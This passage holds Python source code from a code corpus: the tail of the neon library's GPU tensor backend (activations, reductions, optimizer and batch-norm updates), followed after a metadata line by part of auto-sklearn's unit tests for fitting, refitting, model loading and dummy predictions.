outputs[:] = self.ng.sig(inputs) inputs[:] = (1.0 - outputs) * inputs def rectlin(self, x, out): """ Rectified Linear nonlinearity Arguments: x (GPUTensor): Input tensor out (GPUTensor): Output tensor """ self.ng.maximum(x, 0., out=out) return out def rectlin_derivative(self, x, out): """ Rectified linear nonlinearity derivative Arguments: x (GPUTensor): Input tensor out (GPUTensor): Output tensor """ self.ng.greater(x, 0, out=out) return out def rectleaky(self, x, slope, out): """ Leaky rectified linear nonlinearity Arguments: x (GPUTensor): Input tensor slope (float): amount of gradient to apply when unit is not active out (GPUTensor): Output tensor """ out[:] = self.ng.maximum(x, x*slope) def rectleaky_derivative(self, x, slope, out): """ Leaky rectified linear nonlinearity derivative Arguments: x (GPUTensor): Input tensor slope (float): amount of gradient to apply when unit is not active out (GPUTensor): Output tensor """ out[:] = self.ng.greater(x, 0) * (1.0 - slope) + slope def sum(self, tsr, axes, out): """ Sum Arguments: tsr (GPUTensor): Input tensor axes (int): Axis along which the reduction is performed. If axes is None, the tensor is flattened and reduced over both dimensions. out (GPUTensor): Output tensor """ if axes is None: sze = tsr.shape[0]*tsr.shape[1] self.ng.sum(tsr.reshape(sze, 1), axis=0, out=out) else: self.ng.sum(tsr, axis=axes, out=out) return out def norm(self, tsr, order=None, axis=None, out=None): """ Calculates and returns the vector p-norms of the GPUTensor along the specified axis. The p-norm is defined on a vector A as :math:`||A||_p = \sum_i(|A_i|^p)^{1/p}`. Arguments: tsr (GPUTensor): the GPUTensor on which to find the norms order (int): The order or p upon which the norm is calculated. Valid values include: None, inf, -inf, 0, 1, -1, 2, -2, ... axis (int): The axis along which to compute vector norms. out (GPUTensor): where to write the results to. Must be of the expected result shape. Returns: GPUTensor: p-norm of tsr along the specified axis. Raises: IndexError if invalid axis specified AttributeError if invalid order specified See Also: `numpy.linalg.norm` """ if not isinstance(axis, int) or axis < 0 or axis >= len(tsr.shape): raise IndexError("invalid axis value: %s", axis) if not isinstance(order, (int, float)): raise AttributeError("invalid order value: %s", order) if out is None: raise AttributeError("No output tensor speficied", order) if order == float('Inf'): self.ng.max(self.fabs(tsr), axis, out) elif order == float('-Inf'): self.ng.min(self.fabs(tsr), axis, out) elif order == 0: tmp = self.zeros(tsr.shape) self.ng.not_equal(tsr, tmp, tmp) self.ng.sum(tmp, axis, out) else: tmp = self.empty(tsr.shape) self.ng.power(self.fabs(tsr), order, tmp) self.ng.sum(tmp, axis, out) self.ng.power(out, (1.0 / order), out) return out def mean(self, tsr, axes, out): """ Calculates the arithmetic mean of the elements along the specified axes. Arguments: tsr (GPUTensor): Input tensor axes (int): Axis along which the reduction is performed. If axes is None, the tensor is flattened and reduced over both dimensions. out (GPUTensor): Output tensor """ if axes is None: sze = tsr.shape[0]*tsr.shape[1] self.ng.mean(tsr.reshape(sze, 1), axis=0, out=out) else: self.ng.mean(tsr, axis=axes, out=out) return out def min(self, tsr, axes, out): """ Calculates the minimum of the elements along the specified axes. Arguments: tsr (GPUTensor): Input tensor axes (int): Axis along which the reduction is performed. 
If axes is None, the tensor is flattened and reduced over both dimensions. out (GPUTensor): Output tensor """ if axes is None: sze = tsr.shape[0]*tsr.shape[1] self.ng.min(tsr.reshape(sze, 1), axis=0, out=out) else: self.ng.min(tsr, axis=axes, out=out) return out def max(self, tsr, axes, out): """ Calculates the maximum of the elements along the specified axes. Arguments: tsr (GPUTensor): Input tensor axes (int): Axis along which the reduction is performed. If axes is None, the tensor is flattened and reduced over both dimensions. out (GPUTensor): Output tensor """ if axes is None: sze = tsr.shape[0]*tsr.shape[1] self.ng.max(tsr.reshape(sze, 1), axis=0, out=out) else: self.ng.max(tsr, axis=axes, out=out) return out def variance(self, tsr, axes, out, mean=None): """ Calculates the variance of the elements along the specified axes. Arguments: tsr (GPUTensor): the tensor on which to compute the variance axes (int, list, optional): the dimension(s) along which to variance. If set to None, we will variance over all dimensions. out (GPUTensor): where the result will be stored. mean (GPUTensor): the tensor containing mean of tsr Returns: GPUTensor: reference to out """ if mean is None: logger.error("GPUTensor requires mean to be specified.") raise ValueError("mean not specified") self.ng.mean(self.ng.square(tsr-mean), axis=axes, out=out) return out def fabs(self, x, out): """ Calculates absolute value of the elements in a tensor Arguments: x (GPUTensor): Input tensor out (GPUTensor): Output tensor Returns: GPUTensor: reference to out """ self.ng.fabs(x, out=out) return out def sqrt(self, x, out): """ Calculates square root of the elements in a tensor Arguments: x (GPUTensor): Input tensor out (GPUTensor): Output tensor Returns: GPUTensor: reference to out """ self.ng.sqrt(x, out=out) return out def zeros(self, shape, dtype=default_dtype, persist_values=True): """ Allocate a new GPUTensor and fill it with zeros. Arguments: shape (tupel): Shape of the desired GPUTensor dtype (dtype): Optional datatype persist_values (bool, optional): If set to True (the default), the values assigned to this Tensor will persist across multiple begin and end calls. Setting to False may provide a performance increase if values do not need to be maintained across such calls Returns: GPUTensor: output """ return self.ng.zeros(shape, dtype=dtype) def ones(self, shape, dtype=default_dtype, persist_values=True): """ Allocate a new GPUTensor and fill it with ones. Arguments: shape (tupel): Shape of the desired GPUTensor dtype (dtype): Optional datatype persist_values (bool, optional): If set to True (the default), the values assigned to this Tensor will persist across multiple begin and end calls. Setting to False may provide a performance increase if values do not need to be maintained across such calls Returns: GPUTensor: output """ return self.ng.ones(shape, dtype=dtype) def zeros_like(self, ary, dtype=default_dtype, persist_values=True, name=None): """ Instantiate a new instance of this backend's Tensor class, with the shape taken from ary and populating each element with a value of 0. Arguments: ary (tensor object): Tensor to inherit the dimensions of. dtype (data-type, optional): If present, specifies the underlying type to employ for each element. persist_values (bool, optional): If set to True (the default), the values assigned to this Tensor will persist across multiple begin and end calls. 
Setting to False may provide a performance increase if values do not need to be maintained across such calls Returns: Tensor: array object Raises: NotImplementedError: Can't be instantiated directly. See Also: :py:func:`~neon.backends.backend.Backend.empty`, :py:func:`~neon.backends.backend.Backend.ones`, :py:func:`~neon.backends.backend.Backend.array` """ return self.zeros(ary.shape, dtype=dtype, persist_values=persist_values) def empty_like(self, ary, dtype=default_dtype, persist_values=True, name=None): """ Instantiate a new instance of this backend's Tensor class, with the shape taken from ary. Arguments: ary (tensor object): Tensor to inherit the dimensions of. dtype (data-type, optional): If present, specifies the underlying type to employ for each element. persist_values (bool, optional): If set to True (the default), the values assigned to this Tensor will persist across multiple begin and end calls. Setting to False may provide a performance increase if values do not need to be maintained across such calls Returns: Tensor: array object Raises: NotImplementedError: Can't be instantiated directly. See Also: :py:func:`~neon.backends.backend.Backend.empty`, :py:func:`~neon.backends.backend.Backend.ones`, :py:func:`~neon.backends.backend.Backend.array` """ return self.empty(ary.shape, dtype=dtype, persist_values=persist_values, name=name) def empty(self, shape, dtype=default_dtype, persist_values=True, name=None): """ Allocate a new GPUTensor. Arguments: shape (tupel): Shape of the desired GPUTensor dtype (dtype): Optional datatype persist_values (bool, optional): If set to True (the default), the values assigned to this Tensor will persist across multiple begin and end calls. Setting to False may provide a performance increase if values do not need to be maintained across such calls Returns: GPUTensor: output """ return self.ng.empty(shape, dtype=dtype) def copy(self, ary): """ returns a copy of ary """ res = self.empty_like(ary) res.copy(ary) return res def array(self, ary, dtype=default_dtype, persist_values=True, name=None, allocator=drv.mem_alloc): """ Allocate a new GPUTensor and fill it with supplied numpy array. Arguments: ary (ndarray): Numpy array with source data dtype (dtype, optional): Optional datatype persist_values (bool, optional): If set to True (the default), the values assigned to this Tensor will persist across multiple begin and end calls. Setting to False may provide a performance increase if values do not need to be maintained across such calls name (string): Name for the GPUTensor allocator (pycuda): Pycuda memory allocator Returns: GPUTensor: output """ return self.ng.array(ary, dtype=dtype, name=name) def add(self, left, right, out): """ Elementwise addition Arguments: left (GPUTensor, numeric): left-hand side operand. right (GPUTensor, numeric): right-hand side operand. out (GPUTensor): where the result will be stored. Returns: GPUTensor: reference to out """ self.ng.add(left, right, out=out) return out def subtract(self, left, right, out): """ Elementwise subtraction Arguments: left (GPUTensor, numeric): left-hand side operand. right (GPUTensor, numeric): right-hand side operand. out (GPUTensor): where the result will be stored. Returns: GPUTensor: reference to out """ self.ng.subtract(left, right, out=out) return out def multiply(self, left, right, out): """ Elementwise multiplication Arguments: left (GPUTensor, numeric): left-hand side operand. right (GPUTensor, numeric): right-hand side operand. out (GPUTensor): where the result will be stored. 
Returns: GPUTensor: reference to out """ self.ng.multiply(left, right, out=out) return out def divide(self, left, right, out): """ Elementwise division Arguments: left (GPUTensor, numeric): left-hand side operand. right (GPUTensor, numeric): right-hand side operand. out (GPUTensor): where the result will be stored. Returns: GPUTensor: reference to out """ self.ng.divide(left, right, out=out) return out def greater(self, left, right, out): """ Elementwise greater than testing Arguments: left (GPUTensor, numeric): left-hand side operand. right (GPUTensor, numeric): right-hand side operand. out (GPUTensor): where the result will be stored. Returns: GPUTensor: reference to out """ self.ng.greater(left, right, out=out) return out def equal(self, left, right, out): """ Performs element-wise equality testing on each element of left and right, storing the result in out. Each operand is assumed to be the same shape (or broadcastable as such). Arguments: left (GPUTensor, numeric): left-hand side operand. right (GPUTensor, numeric): right-hand side operand. out (GPUTensor): where the result will be stored. Returns: GPUTensor: reference to out """ self.ng.equal(left, right, out=out) return out def not_equal(self, left, right, out): """ Elementwise not equal testing Arguments: left (GPUTensor, numeric): left-hand side operand. right (GPUTensor, numeric): right-hand side operand. out (GPUTensor): where the result will be stored. Returns: GPUTensor: reference to out """ self.ng.not_equal(left, right, out=out) return out def clip(self, a, a_min, a_max, out): """ Elementwise clipping between a range of specified values Arguments: a (GPUTensor): input tensor. a_min (float): floor value. a_max (float): ceiling value. out (GPUTensor): where the result will be stored. Returns: GPUTensor: reference to out """ self.ng.clip(a, a_min, a_max, out=out) return out def log(self, a, out): """ Elementwise base-e logarithm Arguments: a (GPUTensor): input tensor. out (GPUTensor): where the result will be stored. Returns: GPUTensor: reference to out """ self.ng.log(a, out=out) return out def tanh(self, a, out): """ Elementwise tanh Arguments: a (GPUTensor): input tensor. out (GPUTensor): where the result will be stored. Returns: GPUTensor: reference to out """ self.ng.tanh(a, out=out) return out def argmax(self, a, out, axis=0): """ Calculates the indices of the maximal element value along the specified axis. If multiple elements contain the maximum, only the elements of the first are returned. Arguments: tsr (GPUTensor): The GPUTensor on which to find the maximum indices axis (int): The dimension along which to find the maximum. If set to None, find the overall maximum index of a flattened representation of tsr. out (GPUTensor): Where to store the result. Should be of the appropriate type and expected shape Returns: GPUTensor: reference to out """ self.ng.argmax(a, out=out, axis=axis) return out def softmax(self, x, out): """ Softmax nonlinearity. Computes exp(x-max(x)) / sum_i exp(x_i-max(x_i)) Arguments: x (GPUTensor): input tensor. out (GPUTensor): where the result will be stored. Returns: GPUTensor: reference to out """ out[:] = (self.ng.reciprocal(self.ng.sum( self.ng.exp(x - self.ng.max(x, axis=0)), axis=0)) * self.ng.exp(x - self.ng.max(x, axis=0))) return out def softmax_gradient(self, y, err, out): """ Gradient of the softmax nonlinearity. Arguments: y (GPUTensor): input tensor. err (GPUTensor): backpropagated error. out (GPUTensor): where the result will be stored. 
Returns: GPUTensor: reference to out """ raise NotImplementedError("Softmax gradient should use shortcut") return out def make_binary_mask(self, tsr, keepthresh=0.5, dtype=default_dtype): """ Create a binary mask for dropout layers. Arguments: tsr (GPUTensor): Output tensor keepthresh (float): fraction of ones """ self.ng.dropout(keep=keepthresh, out=tsr) def gdm_compound(self, ps_item, us_item, vs_item, momentum_coef, learning_rate, epoch): """ Perform gradient descent update with momentum. Arguments: ps_item (GPUTensor): parameter tensor (e.g. a weight matrix) us_item (GPUTensor): update tensor, contains gradient wrt. weights vs_item (GPUTensor): velocity tensor. momentum_coef (float): momentum coefficient. learning_rate (float): learning rate. epoch (int): epoch (used in conjunction with diagnostics). Outputs are written to vs_item (updated velocity) and ps_item (updated weights) """ vs_item[:] = vs_item * momentum_coef - us_item * learning_rate ps_item[:] = ps_item + vs_item def gdmwd_compound(self, ps_item, us_item, vs_item, momentum_coef, learning_rate, wd, epoch): """ Perform gradient descent update with momentum and weight decay. Arguments: ps_item (GPUTensor): parameter tensor (e.g. a weight matrix) us_item (GPUTensor): update tensor, contains gradient wrt. weights vs_item (GPUTensor): velocity tensor. momentum_coef (float): momentum coefficient. learning_rate (float): learning rate. wd (float): weight decay parameter. epoch (int): epoch (used in conjunction with diagnostics). Outputs: ps_item, the updated weights. vs_item, the updated velocity. us_item, used as a temp buffer. """ vs_item[:] = (vs_item * momentum_coef - us_item * learning_rate - ps_item * learning_rate * wd) ps_item[:] = ps_item + vs_item def exp_mavg(self, mavg, newval, rho): """ Calculate the exponential moving average Arguments: mavg: The running value of the moving average newval: New sample to be added to the moving average rho: Interpolation value """ mavg[:] = rho * mavg + (1.0 - rho) * newval def ada_update(self, ps_item, us_item, gs_item, ds_item, ls_item, ss_item, rho, epsilon): """ Update rule for AdaDelta (Zeiler, http://arxiv.org/abs/1212.5701) Arguments: ps_item: weight / parameter (will be updated) us_item: update gs_item: expected value of Gradient Squared (will be updated) ds_item: expected value of Delta Squared (will be updated) ls_item: learning rate (will be updated) ss_item: Scratch Space rho: decay constant (determines window size) epsilon: small positive constant for numerical stability """ # Accumulate E[Grad^2] gs_item[:] = gs_item * rho + (1.0 - rho) * us_item * us_item # Calculate Updates ls_item[:] = self.ng.sqrt((ds_item + epsilon) / (gs_item + epsilon)) * (-1.0) * us_item # Accumulate E[Delt^2] ds_item[:] = ds_item * rho + (1.0 - rho) * ls_item * ls_item # Final update to the params ps_item[:] = ps_item + ls_item def rms_update(self, params, updates, run_squares, velocity, scratch_space, gamma, epsilon, learning_rate, momentum_coef): # Update running squares run_squares[:] = gamma * run_squares + (1. 
- gamma) * updates * updates # Now scale the gradient by lr / rms(grad) (with a epsilon term for # stability) and use it to update the params if momentum_coef == 0: params[:] = params - learning_rate * updates * self.ng.reciprocal( self.ng.sqrt(run_squares) + epsilon) else: velocity[:] = velocity * momentum_coef - \ learning_rate * updates * \ self.ng.reciprocal(self.ng.sqrt(run_squares) + epsilon) params[:] = params + velocity def fprop_bn_compound(self, inputs, beta, gamma, eps, xhat, xmean, xvar, gmean, gvar, rho, out): """ Batch normalization forward pass, compounded to run in 3 kernel calls. Arguments: inputs: input data to be normalized beta: location parameter gamma: scale parameter eps: small constant for numerical stability xvar: variance (updated) xhat: normalized input (updated) out: normalized and rescaled input (updated) """ xvar[:] = self.ng.var(inputs, axis=1) xmean[:] = self.ng.mean(inputs, axis=1) gmean[:] = gmean * rho + (1.0 - rho) * xmean gvar[:] = gvar * rho + (1.0 - rho) * xvar xvar[:] = self.ng.reciprocal(self.ng.sqrt(xvar + eps)) xhat[:] = xvar * (inputs - xmean) out[:] = xhat * gamma + beta return out def bprop_bn_compound(self, xhat, error, xvar, gamma, beta_updates, gamma_updates): """ Batch normalization backward pass, compounded to run with 4 kernel calls. Arguments: xhat: normalized input data (updated) error: backpropagated deltas (updated) xvar: precomputed variance gamma: scale parameter beta_updates: gradient update for beta (updated) gamma_updates: gradient update for gamma (updated) """ gamma_updates[:] = self.ng.sum(xhat * error, axis=1) beta_updates[:] = self.ng.sum(error, axis=1) xhat[:] = (xhat * gamma_updates + beta_updates) / float(xhat.shape[1]) error[:] = xvar * gamma * (error - xhat)
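The ada_update docstring above describes the AdaDelta rule (Zeiler, arXiv:1212.5701). The same accumulate/scale/accumulate sequence can be restated in plain NumPy so it can be checked independently of the GPU backend; the array names mirror ps_item/us_item/gs_item/ds_item, but this is a re-derivation for illustration, not NervanaGPU code.

import numpy as np

def ada_update_numpy(ps, us, gs, ds, rho, epsilon):
    """Plain-NumPy restatement of the AdaDelta update described above."""
    # Accumulate E[Grad^2]
    gs[:] = rho * gs + (1.0 - rho) * us * us
    # Scaled update; the negative sign makes it a descent step
    step = -np.sqrt((ds + epsilon) / (gs + epsilon)) * us
    # Accumulate E[Delta^2]
    ds[:] = rho * ds + (1.0 - rho) * step * step
    # Final update to the params
    ps[:] = ps + step
    return ps

# tiny usage example
ps = np.ones(3); us = np.full(3, 0.1)
gs = np.zeros(3); ds = np.zeros(3)
ada_update_numpy(ps, us, gs, ds, rho=0.95, epsilon=1e-6)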
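Similarly, fprop_bn_compound above compounds the batch-normalization forward pass into a few kernel calls. The per-row arithmetic it performs can be sketched in NumPy as follows (a sketch assuming inputs of shape (features, batch) and running statistics gmean/gvar of shape (features, 1); again not library code).

import numpy as np

def fprop_bn_numpy(inputs, beta, gamma, eps, gmean, gvar, rho):
    """NumPy sketch of the compounded batch-norm forward pass described above."""
    xmean = inputs.mean(axis=1, keepdims=True)
    xvar = inputs.var(axis=1, keepdims=True)
    # running statistics, updated with exponential smoothing
    gmean[:] = rho * gmean + (1.0 - rho) * xmean
    gvar[:] = rho * gvar + (1.0 - rho) * xvar
    # normalize, then scale and shift
    xhat = (inputs - xmean) / np.sqrt(xvar + eps)
    return xhat * gamma + beta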
1.914063
2
test/test_automl/test_automl.py
ihounie/auto-sklearn
0
11855
# -*- encoding: utf-8 -*- import os import pickle import sys import time import glob import unittest import unittest.mock import numpy as np import pandas as pd import sklearn.datasets from smac.scenario.scenario import Scenario from smac.facade.roar_facade import ROAR from autosklearn.util.backend import Backend from autosklearn.automl import AutoML import autosklearn.automl from autosklearn.data.xy_data_manager import XYDataManager from autosklearn.metrics import accuracy, log_loss, balanced_accuracy import autosklearn.pipeline.util as putil from autosklearn.util.logging_ import setup_logger, get_logger from autosklearn.constants import MULTICLASS_CLASSIFICATION, BINARY_CLASSIFICATION, REGRESSION from smac.tae.execute_ta_run import StatusType sys.path.append(os.path.dirname(__file__)) from base import Base # noqa (E402: module level import not at top of file) class AutoMLStub(AutoML): def __init__(self): self.__class__ = AutoML self._task = None class AutoMLTest(Base, unittest.TestCase): _multiprocess_can_split_ = True def setUp(self): super().setUp() self.automl = AutoMLStub() self.automl._shared_mode = False self.automl._seed = 42 self.automl._backend = unittest.mock.Mock(spec=Backend) self.automl._delete_output_directories = lambda: 0 def test_refit_shuffle_on_fail(self): backend_api = self._create_backend('test_refit_shuffle_on_fail') failing_model = unittest.mock.Mock() failing_model.fit.side_effect = [ValueError(), ValueError(), None] failing_model.fit_transformer.side_effect = [ ValueError(), ValueError(), (None, {})] failing_model.get_max_iter.return_value = 100 auto = AutoML(backend_api, 20, 5) ensemble_mock = unittest.mock.Mock() ensemble_mock.get_selected_model_identifiers.return_value = [(1, 1, 50.0)] auto.ensemble_ = ensemble_mock for budget_type in [None, 'iterations']: auto._budget_type = budget_type auto.models_ = {(1, 1, 50.0): failing_model} # Make sure a valid 2D array is given to automl X = np.array([1, 2, 3]).reshape(-1, 1) y = np.array([1, 2, 3]) auto.refit(X, y) self.assertEqual(failing_model.fit.call_count, 3) self.assertEqual(failing_model.fit_transformer.call_count, 3) del auto self._tearDown(backend_api.temporary_directory) self._tearDown(backend_api.output_directory) def test_only_loads_ensemble_models(self): def side_effect(ids, *args, **kwargs): return models if ids is identifiers else {} # Add a resampling strategy as this is required by load_models self.automl._resampling_strategy = 'holdout' identifiers = [(1, 2), (3, 4)] models = [42] load_ensemble_mock = unittest.mock.Mock() load_ensemble_mock.get_selected_model_identifiers.return_value = identifiers self.automl._backend.load_ensemble.return_value = load_ensemble_mock self.automl._backend.load_models_by_identifiers.side_effect = side_effect self.automl._load_models() self.assertEqual(models, self.automl.models_) self.assertIsNone(self.automl.cv_models_) self.automl._resampling_strategy = 'cv' models = [42] self.automl._backend.load_cv_models_by_identifiers.side_effect = side_effect self.automl._load_models() self.assertEqual(models, self.automl.cv_models_) def test_check_for_models_if_no_ensemble(self): models = [42] self.automl._backend.load_ensemble.return_value = None self.automl._backend.list_all_models.return_value = models self.automl._disable_evaluator_output = False self.automl._load_models() def test_raises_if_no_models(self): self.automl._backend.load_ensemble.return_value = None self.automl._backend.list_all_models.return_value = [] self.automl._resampling_strategy = 'holdout' 
self.automl._disable_evaluator_output = False self.assertRaises(ValueError, self.automl._load_models) self.automl._disable_evaluator_output = True self.automl._load_models() def test_fit(self): backend_api = self._create_backend('test_fit') X_train, Y_train, X_test, Y_test = putil.get_dataset('iris') automl = autosklearn.automl.AutoML( backend=backend_api, time_left_for_this_task=20, per_run_time_limit=5, metric=accuracy, ) automl.fit( X_train, Y_train, task=MULTICLASS_CLASSIFICATION, ) score = automl.score(X_test, Y_test) self.assertGreaterEqual(score, 0.8) self.assertEqual(automl._task, MULTICLASS_CLASSIFICATION) del automl self._tearDown(backend_api.temporary_directory) self._tearDown(backend_api.output_directory) def test_delete_non_candidate_models(self): backend_api = self._create_backend( 'test_delete', delete_tmp_folder_after_terminate=False) seed = 555 X, Y, _, _ = putil.get_dataset('iris') automl = autosklearn.automl.AutoML( backend_api, time_left_for_this_task=30, per_run_time_limit=5, ensemble_nbest=3, seed=seed, initial_configurations_via_metalearning=0, resampling_strategy='holdout', include_estimators=['sgd'], include_preprocessors=['no_preprocessing'], metric=accuracy, ) automl.fit(X, Y, task=MULTICLASS_CLASSIFICATION, X_test=X, y_test=Y) # Assert at least one model file has been deleted and that there were no # deletion errors log_file_path = glob.glob(os.path.join( backend_api.temporary_directory, 'AutoML(' + str(seed) + '):*.log')) with open(log_file_path[0]) as log_file: log_content = log_file.read() self.assertIn('Deleted files of non-candidate model', log_content) self.assertNotIn('Failed to delete files of non-candidate model', log_content) self.assertNotIn('Failed to lock model', log_content) # Assert that the files of the models used by the ensemble weren't deleted model_files = backend_api.list_all_models(seed=seed) model_files_idx = set() for m_file in model_files: # Extract the model identifiers from the filename m_file = os.path.split(m_file)[1].replace('.model', '').split('.', 2) model_files_idx.add((int(m_file[0]), int(m_file[1]), float(m_file[2]))) ensemble_members_idx = set(automl.ensemble_.identifiers_) self.assertTrue(ensemble_members_idx.issubset(model_files_idx)) del automl self._tearDown(backend_api.temporary_directory) self._tearDown(backend_api.output_directory) def test_fit_roar(self): def get_roar_object_callback( scenario_dict, seed, ta, ta_kwargs, **kwargs ): """Random online adaptive racing. 
http://ml.informatik.uni-freiburg.de/papers/11-LION5-SMAC.pdf""" scenario = Scenario(scenario_dict) return ROAR( scenario=scenario, rng=seed, tae_runner=ta, tae_runner_kwargs=ta_kwargs, ) backend_api = self._create_backend('test_fit_roar') X_train, Y_train, X_test, Y_test = putil.get_dataset('iris') automl = autosklearn.automl.AutoML( backend=backend_api, time_left_for_this_task=20, per_run_time_limit=5, initial_configurations_via_metalearning=0, get_smac_object_callback=get_roar_object_callback, metric=accuracy, ) setup_logger() automl._logger = get_logger('test_fit_roar') automl.fit( X_train, Y_train, task=MULTICLASS_CLASSIFICATION, ) score = automl.score(X_test, Y_test) self.assertGreaterEqual(score, 0.8) self.assertEqual(automl._task, MULTICLASS_CLASSIFICATION) del automl self._tearDown(backend_api.temporary_directory) self._tearDown(backend_api.output_directory) def test_binary_score_and_include(self): """ Test fix for binary classification prediction taking the index 1 of second dimension in prediction matrix """ backend_api = self._create_backend('test_binary_score_and_include') data = sklearn.datasets.make_classification( n_samples=400, n_features=10, n_redundant=1, n_informative=3, n_repeated=1, n_clusters_per_class=2, random_state=1) X_train = data[0][:200] Y_train = data[1][:200] X_test = data[0][200:] Y_test = data[1][200:] automl = autosklearn.automl.AutoML( backend_api, 20, 5, include_estimators=['sgd'], include_preprocessors=['no_preprocessing'], metric=accuracy, ) automl.fit(X_train, Y_train, task=BINARY_CLASSIFICATION) self.assertEqual(automl._task, BINARY_CLASSIFICATION) # TODO, the assumption from above is not really tested here # Also, the score method should be removed, it only makes little sense score = automl.score(X_test, Y_test) self.assertGreaterEqual(score, 0.4) del automl self._tearDown(backend_api.temporary_directory) self._tearDown(backend_api.output_directory) def test_automl_outputs(self): backend_api = self._create_backend('test_automl_outputs') X_train, Y_train, X_test, Y_test = putil.get_dataset('iris') name = 'iris' data_manager_file = os.path.join( backend_api.temporary_directory, '.auto-sklearn', 'datamanager.pkl' ) auto = autosklearn.automl.AutoML( backend_api, 20, 5, initial_configurations_via_metalearning=0, seed=100, metric=accuracy, ) setup_logger() auto._logger = get_logger('test_automl_outputs') auto.fit( X=X_train, y=Y_train, X_test=X_test, y_test=Y_test, dataset_name=name, task=MULTICLASS_CLASSIFICATION, ) # pickled data manager (without one hot encoding!) 
with open(data_manager_file, 'rb') as fh: D = pickle.load(fh) self.assertTrue(np.allclose(D.data['X_train'], X_train)) # Check that all directories are there fixture = ['cv_models', 'true_targets_ensemble.npy', 'start_time_100', 'datamanager.pkl', 'predictions_ensemble', 'ensembles', 'predictions_test', 'models'] self.assertEqual(sorted(os.listdir(os.path.join(backend_api.temporary_directory, '.auto-sklearn'))), sorted(fixture)) # At least one ensemble, one validation, one test prediction and one # model and one ensemble fixture = os.listdir(os.path.join(backend_api.temporary_directory, '.auto-sklearn', 'predictions_ensemble')) self.assertGreater(len(fixture), 0) fixture = glob.glob(os.path.join(backend_api.temporary_directory, '.auto-sklearn', 'models', '100.*.model')) self.assertGreater(len(fixture), 0) fixture = os.listdir(os.path.join(backend_api.temporary_directory, '.auto-sklearn', 'ensembles')) self.assertIn('100.0000000001.ensemble', fixture) # Start time start_time_file_path = os.path.join(backend_api.temporary_directory, '.auto-sklearn', "start_time_100") with open(start_time_file_path, 'r') as fh: start_time = float(fh.read()) self.assertGreaterEqual(time.time() - start_time, 10) del auto self._tearDown(backend_api.temporary_directory) self._tearDown(backend_api.output_directory) def test_do_dummy_prediction(self): datasets = { 'breast_cancer': BINARY_CLASSIFICATION, 'wine': MULTICLASS_CLASSIFICATION, 'diabetes': REGRESSION, } for name, task in datasets.items(): backend_api = self._create_backend('test_do_dummy_prediction') X_train, Y_train, X_test, Y_test = putil.get_dataset(name) datamanager = XYDataManager( X_train, Y_train, X_test, Y_test, task=task, dataset_name=name, feat_type=None, ) auto = autosklearn.automl.AutoML( backend_api, 20, 5, initial_configurations_via_metalearning=25, metric=accuracy, ) setup_logger() auto._logger = get_logger('test_do_dummy_predictions') auto._backend.save_datamanager(datamanager) D = backend_api.load_datamanager() # Check if data manager is correcly loaded self.assertEqual(D.info['task'], datamanager.info['task']) auto._do_dummy_prediction(D, 1) # Ensure that the dummy predictions are not in the current working # directory, but in the temporary directory. self.assertFalse(os.path.exists(os.path.join(os.getcwd(), '.auto-sklearn'))) self.assertTrue(os.path.exists(os.path.join( backend_api.temporary_directory, '.auto-sklearn', 'predictions_ensemble', 'predictions_ensemble_1_1_0.0.npy'))) del auto self._tearDown(backend_api.temporary_directory) self._tearDown(backend_api.output_directory) @unittest.mock.patch('autosklearn.evaluation.ExecuteTaFuncWithQueue.run') def test_fail_if_dummy_prediction_fails(self, ta_run_mock): backend_api = self._create_backend('test_fail_if_dummy_prediction_fails') X_train, Y_train, X_test, Y_test = putil.get_dataset('iris') datamanager = XYDataManager( X_train, Y_train, X_test, Y_test, task=2, feat_type=['Numerical' for i in range(X_train.shape[1])], dataset_name='iris', ) time_for_this_task = 30 per_run_time = 10 auto = autosklearn.automl.AutoML(backend_api, time_for_this_task, per_run_time, initial_configurations_via_metalearning=25, metric=accuracy, ) setup_logger() auto._logger = get_logger('test_fail_if_dummy_prediction_fails') auto._backend._make_internals_directory() auto._backend.save_datamanager(datamanager) # First of all, check that ta.run() is actually called. 
ta_run_mock.return_value = StatusType.SUCCESS, None, None, "test" auto._do_dummy_prediction(datamanager, 1) ta_run_mock.assert_called_once_with(1, cutoff=time_for_this_task) # Case 1. Check that function raises no error when statustype == success. # ta.run() returns status, cost, runtime, and additional info. ta_run_mock.return_value = StatusType.SUCCESS, None, None, "test" raised = False try: auto._do_dummy_prediction(datamanager, 1) except ValueError: raised = True self.assertFalse(raised, 'Exception raised') # Case 2. Check that if statustype returned by ta.run() != success, # the function raises error. ta_run_mock.return_value = StatusType.CRASHED, None, None, "test" self.assertRaisesRegex(ValueError, 'Dummy prediction failed with run state StatusType.CRASHED ' 'and additional output: test.', auto._do_dummy_prediction, datamanager, 1, ) ta_run_mock.return_value = StatusType.ABORT, None, None, "test" self.assertRaisesRegex(ValueError, 'Dummy prediction failed with run state StatusType.ABORT ' 'and additional output: test.', auto._do_dummy_prediction, datamanager, 1, ) ta_run_mock.return_value = StatusType.TIMEOUT, None, None, "test" self.assertRaisesRegex(ValueError, 'Dummy prediction failed with run state StatusType.TIMEOUT ' 'and additional output: test.', auto._do_dummy_prediction, datamanager, 1, ) ta_run_mock.return_value = StatusType.MEMOUT, None, None, "test" self.assertRaisesRegex(ValueError, 'Dummy prediction failed with run state StatusType.MEMOUT ' 'and additional output: test.', auto._do_dummy_prediction, datamanager, 1, ) ta_run_mock.return_value = StatusType.CAPPED, None, None, "test" self.assertRaisesRegex(ValueError, 'Dummy prediction failed with run state StatusType.CAPPED ' 'and additional output: test.', auto._do_dummy_prediction, datamanager, 1, ) self._tearDown(backend_api.temporary_directory) self._tearDown(backend_api.output_directory) @unittest.mock.patch('autosklearn.smbo.AutoMLSMBO.run_smbo') def test_exceptions_inside_log_in_smbo(self, smbo_run_mock): # Make sure that any exception during the AutoML fit due to # SMAC are properly captured in a log file backend_api = self._create_backend('test_exceptions_inside_log') self._tearDown(backend_api.temporary_directory) self._tearDown(backend_api.output_directory) automl = autosklearn.automl.AutoML( backend_api, 20, 5, metric=accuracy, ) output_file = 'test_exceptions_inside_log.log' setup_logger(output_file=output_file) logger = get_logger('test_exceptions_inside_log') # Create a custom exception to prevent other errors to slip in class MyException(Exception): pass X_train, Y_train, X_test, Y_test = putil.get_dataset('iris') # The first call is on dummy predictor failure message = str(np.random.randint(100)) + '_run_smbo' smbo_run_mock.side_effect = MyException(message) with unittest.mock.patch('autosklearn.automl.AutoML._get_logger') as mock: mock.return_value = logger with self.assertRaises(MyException): automl.fit( X_train, Y_train, task=MULTICLASS_CLASSIFICATION, ) with open(output_file) as f: self.assertTrue(message in f.read()) # Cleanup os.unlink(output_file) self._tearDown(backend_api.temporary_directory) self._tearDown(backend_api.output_directory) def 